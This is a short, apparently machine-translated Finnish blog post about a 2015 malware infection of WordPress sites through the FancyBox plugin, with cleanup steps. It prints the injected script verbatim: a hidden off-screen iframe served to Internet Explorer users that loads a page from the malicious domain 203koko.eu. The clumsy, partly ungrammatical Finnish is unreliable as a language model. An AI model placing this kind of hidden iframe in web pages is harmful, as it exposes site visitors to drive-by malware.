Aiemmin tällä viikolla useita verkkosivustoja ja blogeja WordPress, sai varoitukset käyttäjältä malware infektio kautta Google Webmaster.
Ongelma, johon Google Webmaster viitataan, on läsnä koodi / käsikirjoitus iframe haittaohjelmia lähde sivustot.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>
Näyttää siltä, että se on alttius a kytkeäsäännöstön FancyBox varten WordPress joka vasta eilen (05.02.2015) ei ole päivitetty pitkään aikaan.
Tämän ongelman ratkaiseminen ja desinfiointia virukset sivustot tämä haittaohjelma on suhteellisen yksinkertainen.
1. Poista FancyBox-laajennus käytöstä.
2. Poista kaikki tiedostot plugin FancyBox palvelimelle (FTP)
3. Asenna laajennuksen uusi versio (Fancybox 3.0.4)
FancyBox varten WordPress 3.0.4
- Nimettiin uudelleen asetus, johon 3.0.3:ssa mainittu tietoturvaongelma vaikuttaa. Tämän pitäisi estää haitallista koodia näkymästä sivustoilla, joissa laajennus on updated poistamatta haitallista koodia.
FancyBox varten WordPress 3.0.3
- Korjattu tietoturvaongelma.
Haittaohjelmatiedot:
TYYPPI: iframe uudelleenohjaus
TARGET: WordPress fancybox
HAITTAOHJELMAT domain: 203koko.eu
HAITTAOHJELMISTA URI: http://203koko.eu/hjnfh/ipframe2.php
LAITTEISTO RAW KOODIT:
KIRJALLINEN OHJELMA: if (navigator.userAgent.match(/msie/i)) { document.write(‘
Poista haittaohjelmat WordPress verkkosivusto.